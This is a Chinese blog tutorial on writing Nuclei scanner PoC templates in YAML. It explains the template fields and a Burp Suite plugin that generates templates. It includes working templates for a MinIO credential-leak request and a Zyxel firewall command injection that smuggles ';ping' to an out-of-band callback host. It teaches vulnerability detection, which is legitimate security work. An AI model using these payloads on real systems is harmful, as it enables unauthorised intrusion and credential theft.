Day102:漏洞发现-漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

最新推荐文章于 2024-09-12 07:55:48 发布
最新推荐文章于 2024-09-12 07:55:48 发布
阅读量1.1k 收藏 21
点赞数 13
分类专栏: 漏洞发现 文章标签: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/137160259
版权

目录

Nuclei-Poc开发-环境配置&编写流程

Nuclei-Poc开发-Yaml语法&匹配提取

Yaml Poc模版:

开发流程:

案例1:CVE-2023-28432 (匹配结果)

案例2:CVE-2022-30525(匹配交互)

Nuclei-Poc开发-BurpSuite一键生成插件

知识点:

1、Nuclei-Poc开发-环境配置&编写流程

2、Nuclei-Poc开发-Yaml语法&匹配提取

3、Nuclei-Poc开发-BurpSuite一键生成插件

Nuclei-Poc开发-环境配置&编写流程

1、开发环境:Vscode+Yaml插件

https://code.visualstudio.com/

2、开发文档参考资料

官方文档

https://docs.projectdiscovery.io/templates/protocols/http/basic-http

nuclei poc模板编写笔记

https://blog.csdn.net/qq_41315957/article/details/126594572
https://blog.csdn.net/qq_41315957/article/details/126594670

Nuclei-Poc开发-Yaml语法&匹配提取

YAML是一种数据序列化语言,它的基本语法规则注意如下:

  • 大小写敏感
  • 使用缩进表示层级关系
  • 缩进时不允许使用Tab键,只允许使用空格。
  • 缩进的空格数目不重要,只要相同层级的元素左侧对齐即可

Yaml Poc模版:

1、编号 id(描述)

2、信息 info(描述)

3、请求 http file tcp等(漏洞以什么方式请求)

4、匹配 matchers Interactsh(对结果匹配关键字来判断是否存在漏洞)

5、提取 extractors(对结果提取页面长度、状态等来判断是否存在漏洞)

开发流程:

0、poc模版套用修改

1、poc创建独立编号

2、poc填入详细信息

3、poc提交协议流程编写

4、poc结果匹配模式判断

5、poc结果提取模式判断

案例1:CVE-2023-28432 (匹配结果)

https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md

id: CVE-2023-28432

info:
  name: MinIO集群模式信息泄露漏洞(CVE-2023-28432)
  author: xiaodisec
  severity: low
  description: 在其RELEASE.2023-03-20T20-16-18Z版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。
  reference:
    - https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md
  tags: MinIO,CVE
  
http:
  - raw:
      - |
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: word
        part: body
        words:
          - '"MINIO_ROOT_PASSWORD":'
          - '"MINIO_ROOT_USER":'
          - '"MinioEnv":'
        condition: and

案例2:CVE-2022-30525(匹配交互)

https://blog.csdn.net/weixin_43080961/article/details/124776553

id: CVE-2022-30525

info:
  name: Zyxel 防火墙远程命令注入漏洞
  author: xiaodisec
  severity: high
  description: 该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
  reference:
    - https://blog.csdn.net/weixin_43080961/article/details/124776553
  tags: zyxel,cve,rce
  
http:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exploit}}","data":"hi"}
    payloads:
      exploit:
        - ";ping -c 3 {{interactsh-url}};"
    
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

Nuclei-Poc开发-BurpSuite一键生成插件

nuclei-burp-plugin:

https://github.com/projectdiscovery/nuclei-burp-plugin

1、导入或商店安装

2、配置插件路径信息

3、数据包选择生成模版

CVE-2023-28432

然后在bp复现下这个漏洞poc,成功后右键数据包使用插件生成nuclei插件模板

CVE-2022-30525

Dao-道法自然
关注
专栏目录
poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的Docker,Docker-Compose,Kubernetes,Openshift项目,从而缩短从查找项目到在本地环境中初始化项目的路线
05-03
POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的Docker,Docker-Compose,Kubernetes项目,从而缩短了从查找项目到在本地环境中初始化项目的路线。 很简单。 使用非常简单的命令行界面配置,运行和在项目之间切换。 灵活性强。 轻松管理,扩展和维护任何复杂性的项目。 配置一次,到处使用。 一次配置项目,以便团队其他成员将感受到零配置的价值。 特征 开箱即用的Docker,Docker-Compose,Kubernetes,Helm支持。 Git,SVN支持开箱即用。 项目目录,多个目录。 创建您自己的项目目录。 无需其他工具即可组织您的项目。 多个计划。 为不同的环境甚至是出于演示目的的环境创建多个计划。 轻松地在计划(环境)之间切换。 简单的配置文件。 Poco有助于拆分配置文件,因此可以随时轻松维护和扩展它们。 脚本支持(挂钩
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 2225
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
CVE-2023-28432:MinIO信息泄露漏洞利用工具安装与使用教程
最新发布
gitblog_00836的博客
09-12 714
CVE-2023-28432:MinIO信息泄露漏洞利用工具安装与使用教程 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2023-28432 项目概述 本教程将引导您了解并使用由Mr-xn维护的关于CVE-2023-28432的信息泄露漏洞利用工具。此项目针对的是MinIO对象存储服务中发现的一个严重安全漏洞,允许未认证的远程攻击者通过特定请求获取敏感环境...
漏洞发现-漏扫项目&Poc开发&Yaml语法&反链判断&不回显检测&Yaml生成
siu~
03-20 1034
1、Xray&Afrog-Poc开发-环境配置&编写流程 2、Xray-Poc开发-数据回显&RCE不回显&实验室 3、Afrog-Poc开发-数据回显&RCE不回显&JDNI注入 章节点: 漏洞发现-Web&框架组件&中间件&APP&小程序&系统 扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫 Poc开发-Ymal语法&联动导入&项目拓展 扫描插件-Burpsuite插件&浏览器插件&自动模版
xray插件改良5-poc-yaml-duomicms-sqli
HWHXY的博客
03-23 607
xray插件改良5-poc-yaml-duomicms-sqli 前言 poc-yaml-duomicms-sqli原始的ymlpoc-yaml-duomicms-sqli name: poc-yaml-duomicms-sqli rules: - method: GET path: >- /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(20
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce
HWHXY的博客
03-23 468
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce 前言 poc-yaml-dlink-dsl-2888a-rce原始的yml poc-yaml-dlink-dsl-2888a-rce name: poc-yaml-dlink-dsl-2888a-rce rules: - method: GET path: /page/login/login.html follow_redirects: false expression: | respons
第79天:Python开发-sqlmapapi&Tamper&Pocsuite1
08-03
在本课程中,我们将深入探讨Python开发中的几个关键工具,包括sqlmapapi、Tamper模块以及Pocsuite,这些都是在网络安全领域中用于自动化安全检测的重要工具。以下是对这些知识点的详细说明: ### 1. Python的...
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地环境可以不管) 本人...
vscode-yaml-plus-json:VSCode扩展使yaml和json之间的转换变得简单快捷
04-04
YAML加JSON 轻松将YAML转换为JSON,反之亦然。 转换可以由单个文件或文件夹中的所有文件完成。 有什么好主意或功能要求吗? 请不要犹豫,打开! 功能和用法 转换单个文件: 右键单击一个YAML文件并将其Convert to JSON ,然后选择Convert to JSON 。 通过将文件扩展名更改为.json将YAML文件转换为JSON。 右键单击JSON文件并将其Convert to YAML ,然后选择Convert to YAML 。 通过将文件扩展名更改为.yaml或.yml将JSON文件转换为YAML。 转换文字选择: 使用命令将YAML选择Convert selection to JSON不更改文件扩展名。 使用命令将JSON选择Convert selection to YAML不更改文件扩展名。 转换多个文件: 右键单击所选文件之一,然后选
vscode 插件合集2
05-26
vscode插件合集,05月最新,包括以下插件: bibhasdn.django-html-1.2.0 bibhasdn.django-snippets-1.1.0 bitlang.cobol-1.7.8 christian-kohler.npm-intellisense-1.3.0 christian-kohler.path-intellisense-1.4.2 chrmarti.regex-0.2.0 CoenraadS.bracket-pair-colorizer-1.0.37 daltonjorge.scala-0.0.5 danields761.dracula-theme-from-intellij-pythoned-0.1.4 DavidAnson.vscode-markdownlint-0.17.0 dbaeumer.vscode-eslint-1.4.10 donjayamanne.jupyter-1.1.4 donjayamanne.python-extension-pack-1.0.1 DotJoshJohnson.xml-1.9.2 DotJoshJohnson.xml-2.0.0 eg2.vscode-npm-script-0.3.4 eriklynd.json-tools-1.0.2 fisheva.eva-theme-0.3.1 formulahendry.code-runner-0.9.3 formulahendry.terminal-0.0.10 gerane.theme-druid-0.0.2 GrapeCity.gc-excelviewer-2.0.21 humao.rest-client-0.18.4 humy2833.ftp-simple-0.6.3 Ikuyadeu.r-0.5.9 Ikuyadeu.r-lsp-0.0.7 itryapitsin.scala-0.1.7 itryapitsin.scalasnippets-0.1.7 jasonnutter.search-node-modules-1.3.0 jithurjacob.nbpreviewer-1.0.0 josephtbradley.hive-sql-0.0.2 kalitaalexey.vscode-rust-0.4.2 kondratiev.sshextension-0.2.1 luqimin.forgive-green-0.2.1 magicstack.magicpython-1.0.12 mohsen1.prettify-json-0.0.3 mooman219.rust-assist-0.2.0 ms-python.anaconda-extension-pack-1.0.0 ms-python.python-2018.4.0 ms-toolsai.vscode-ai-0.1.8 ms-vscode.go-0.6.80 mtxr.sqltools-0.13.0 PKief.material-icon-theme-3.4.0 qub.qub-xml-vscode-1.2.8 redhat.java-0.25.0 redhat.vscode-yaml-0.0.12 rust-lang.rust-0.4.3 rust-lang.rust-0.4.4 scala-lang.scala-0.1.2 sensourceinc.vscode-sql-beautify-0.0.4 truman.autocomplate-shell-0.1.1 vahidk.tensorflow-snippets-0.3.3 vscjava.vscode-java-debug-0.9.0 vscjava.vscode-java-pack-0.3.0 vscjava.vscode-java-test-0.6.1 vscjava.vscode-maven-0.8.0 waderyan.nodejs-extension-pack-0.1.9 wholroyd.jinja-0.0.8 xabikos.javascriptsnippets-1.6.0 yzhang.markdown-all-in-one-1.3.0 yzhang.markdown-all-in-one-1.4.0 ZakCodes.rust-snippets-0.0.1 zhuangtongfa.material-theme-2.13.5 zhuangtongfa.material-theme-2.13.6
POC_百卓网络Smart多业务安全网关
LiBai'S BLOG
01-13 2259
百卓网络Smart多业务安全网关 HTTP admin admin Administrator 指纹 "<title>Smart--管理平台</title>" POC name: poc-yaml-smart-admin-default-password level: 2 finger: | "smart-admin" in finger.name rules: - method: POST path: /login.php body: | .
xray插件改良6-poc-yaml-ecshop-360-rce
HWHXY的博客
03-23 625
xray插件改良6-poc-yaml-ecshop-360-rce 前言 原始yml name: poc-yaml-ecshop-360-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: /user.php headers: Referer: >- 45ea207d7a2b68c49582d2d22adf953a
VsCode-YAML支持追加(Swagger,CloudFormation)
热门推荐
风吹草动的博客
02-20 1万+
SpringBoot工程配置文件,CloudFormation文件等都支持Yaml格式, 因此在VsCode中追加Yaml的支持 基本插件 YAML Support by Red Hat. 只是简单安装插件后,就直接可以支持基本的属性设定。 对应其他第三方或者自定义的设置时,需要追加一些设定 Swagger对应 在 settings.json 文件中添加 "yaml.schemas": { ...
探索强大的YAML语言支持:Red Hat的VS Code扩展
gitblog_00028的博客
05-19 746
探索强大的YAML语言支持:Red Hat的VS Code扩展 vscode-yaml YAML support for VS Code with built-in kubernetes syntax support 项目地址: https://gitcode.c...
k8s基本概念、k8s对象、三个命令玩转所有的yaml写法、给vscode安装插件、kubectl和kubelet及自动补全
一切随心走的博客
08-19 1960
k8s里面操作的资源实体,就是k8s的对象,可以使用yaml来声明对象。然后让k8s根据yaml的声明创建出这个对象;操作 Kubernetes 对象 —— 无论是创建、修改,或者删除 —— 需要使用 Kubernetes API。比如,当使用 kubectl 命令行接口时,CLI 会执行必要的 Kubernetes API 调用Kubernetes对象指的是Kubernetes系统的持久化实体,所有这些对象合起来,代表了你集群的实际情况。常规的应用里,我们把应用程序的数据存储在数据库中,
使用vscode快速编写k8s资源清单yaml
识途老码
06-02 4955
使用vscode快速编写k8s资源清单
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值